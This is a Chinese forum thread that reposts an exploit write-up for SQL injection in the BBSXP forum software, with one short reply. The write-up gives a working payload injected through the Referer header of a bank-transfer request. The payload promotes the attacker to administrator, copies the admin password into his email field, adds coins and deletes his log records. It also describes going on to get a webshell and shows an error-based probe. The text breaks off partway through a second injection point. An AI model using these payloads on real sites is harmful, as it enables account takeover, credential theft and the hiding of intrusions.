服务器维护,服务器代维,安全设置,漏洞扫描,入侵检测服务

wuqing 发表于 2007-2-9 00:11:26

bbsxp log 注入

By&nbsp;WhyTt<BR>参数直接带如查询的函数和过程<BR><BR>menu<BR>BBSList<BR>ForumTree<BR>Log<BR>ShowRank<BR>ShowRole<BR>DelFile//deletefile<BR>还记的以前在blog发的一篇bbsxp分析文档,<A href="http://computer.mblogger.cn/whytt/posts/59457.aspx" target=_blank>http://computer.mblogger.cn/whytt/posts/59457.aspx</A><BR><BR>由于当时只看到在监狱那里有对log的引用,而没看到这里居然还有,所以一直没继续看下去,考试大部分完了,现在每天没撒事,于是看看代码打发时间,今天早上选的是bbsxp来开刀,嘿嘿~~~~<BR>在bank.asp这个文件中,在倒数第6行那里有个对log过程的引用,<BR>就是在银行转帐这里,思路是这里的。<BR><BR>先注册2个用户,拿一个用户跟几个帖子,赚10个金币,然后去银行那里去转帐,选自己刚才注册的另一个用户,然后抓个包,修改数据包里的相关参数,具体请看log过程<BR><BR>sub&nbsp;Log(Message)<BR>if&nbsp;Request.ServerVariables("Query_String")&lt;&gt;""&nbsp;then&nbsp;Query_String="?"&amp;Request.ServerVariables("Query_String")&amp;""<BR>Conn.Execute("insert&nbsp;into&nbsp;&nbsp;(UserName,IPAddress,UserAgent,HttpVerb,PathAndQuery,Referrer,ErrDescription,POSTData,Notes)&nbsp;values&nbsp;('"&amp;CookieUserName&amp;"','"&amp;Request.ServerVariables("REMOTE_ADDR")&amp;"','"&amp;HTMLEncode(Request.Servervariables("HTTP_User_AGENT"))&amp;"','"&amp;Request.ServerVariables("request_method")&amp;"','<A href="http:///" target=_blank target=_blank>http://</A>"&amp;Request.ServerVariables("server_name")&amp;""&amp;Request.ServerVariables("script_name")&amp;""&amp;Query_String&amp;"','"&amp;Request.ServerVariables("HTTP_REFERER")&amp;"','"&amp;Err.Description&amp;"','"&amp;Request.Form&amp;"','"&amp;Message&amp;"')")<BR>end&nbsp;sub<BR><BR>我们就拿其中的Request.ServerVariables("HTTP_REFERER")来注入,这个log过程在我转帐的时候执行的查询<BR><BR>insert&nbsp;into&nbsp;&nbsp;(UserName,IPAddress,UserAgent,HttpVerb,PathAndQuery,Referrer,ErrDescription,POSTData,Notes)&nbsp;values&nbsp;('whytt1','127.0.0.1','Mozilla/4.0&nbsp;(compatible;&nbsp;MSIE&nbsp;6.0;&nbsp;Windows&nbsp;NT&nbsp;5.0)','POST','<A href="http:///" target=_blank target=_blank>http://</A>127.0.0.1/Bank.asp','<A href="http:///" target=_blank target=_blank>http://</A>127.0.0.1/Bank.asp',",'menu=virement&amp;qmoney=10&amp;dxname=whytt&amp;B2=+%C8%B7+%B6%A8+','whytt1&nbsp;通过银行转帐&nbsp;¥10&nbsp;给&nbsp;whytt')<BR><BR>其中最后一个<A href="http://127.0.0.1/Bank.asp" target=_blank target=_blank>http://127.0.0.1/Bank.asp</A>就是我们需要修改的Request.ServerVariables("HTTP_REFERER"),为<A href="http://127.0.0.1/Bank.asp" target=_blank target=_blank>http://127.0.0.1/Bank.asp</A>',",'menu=virement&amp;qmoney=10&amp;dxname=whytt&amp;B2=+%C8%B7+%B6%A8+','whytt1&nbsp;通过银行转帐&nbsp;¥10&nbsp;给&nbsp;whytt');update&nbsp;bbsxp_users&nbsp;set&nbsp;userRoleid=1,usermoney=999,usermail=(select&nbsp;top&nbsp;1&nbsp;adminpassword&nbsp;from&nbsp;bbsxp_sitesettings)&nbsp;where&nbsp;username='whytt';update&nbsp;bbsxp_sitesettings&nbsp;set&nbsp;adminpassword=(select&nbsp;userpass&nbsp;from&nbsp;bbsxp_users&nbsp;where&nbsp;username='whytt');delete&nbsp;from&nbsp;bbsxp_log&nbsp;where&nbsp;username='tt521'&nbsp;or&nbsp;username='xiaot';--<BR><BR>这样带入查询就是:<BR><BR>insert&nbsp;into&nbsp;&nbsp;(UserName,IPAddress,UserAgent,HttpVerb,PathAndQuery,Referrer,ErrDescription,POSTData,Notes)&nbsp;values&nbsp;('whytt1','127.0.0.1','Mozilla/4.0&nbsp;(compatible;&nbsp;MSIE&nbsp;6.0;&nbsp;Windows&nbsp;NT&nbsp;5.0)','POST','<A href="http:///" target=_blank target=_blank>http://</A>127.0.0.1/Bank.asp','<A href="http:///" target=_blank target=_blank>http://</A>127.0.0.1/Bank.asp',",'menu=virement&amp;qmoney=10&amp;dxname=whytt&amp;B2=+%C8%B7+%B6%A8+','whytt1&nbsp;通过银行转帐&nbsp;¥10&nbsp;给&nbsp;whytt');update&nbsp;bbsxp_users&nbsp;set&nbsp;userRoleid=1,usermoney=999,usermail=(select&nbsp;top&nbsp;1&nbsp;adminpassword&nbsp;from&nbsp;bbsxp_sitesettings)&nbsp;where&nbsp;username='whytt';update&nbsp;bbsxp_sitesettings&nbsp;set&nbsp;adminpassword=(select&nbsp;userpass&nbsp;from&nbsp;bbsxp_users&nbsp;where&nbsp;username='whytt');delete&nbsp;from&nbsp;bbsxp_log&nbsp;where&nbsp;username='tt521'&nbsp;or&nbsp;username='xiaot';--这样就把我们的whytt设置成了管理员了,而且把后台密码输出到whytt的油箱那里,而且给自己加上了999的金币,哈哈够用了吧。最后删除log表中我们的操作记录,最后然后进后台看web的绝对路径,然后通过backup&nbsp;log来拿webshell。<BR>By&nbsp;WhyTt<BR><BR>补充:为了进一步确认数据库的类型,可以通过bbsxp的一个小bug来实现。<BR><A href="http://127.0.0.1/UserTop.asp?order=" target=_blank target=_blank>http://127.0.0.1/UserTop.asp?order=</A>'whytt"0<BR>这里有时候不暴错,就在后面乱加些字符吧。。呵呵~~~我测试过,加了几次就暴错,就看到数据库的类型了。&nbsp;:)<BR>后来发现用bank.asp这里来搞非常费力,要有足够的金币,所以又专门找了下其他asp文件,发现在<BR><BR>if&nbsp;Request.Form("UpFileID")&lt;&gt;""&nbsp;then<BR>UpFileID=split(Request.form("UpFileID"),",")<BR>for&nbsp;i&nbsp;=&nbsp;0&nbsp;to&nbsp;ubound(UpFileID)-1<BR>Conn.execute("update&nbsp;&nbsp;set&nbsp;Category='"&amp;Category&amp;"',Description='"&amp;Subject

iceman02 发表于 2006-5-19 17:11:34

re:bbsxp log 注入

<P>看不懂,利用的是输入法漏洞吗?还是什么?</P>
页: [1]
查看完整版本: bbsxp log 注入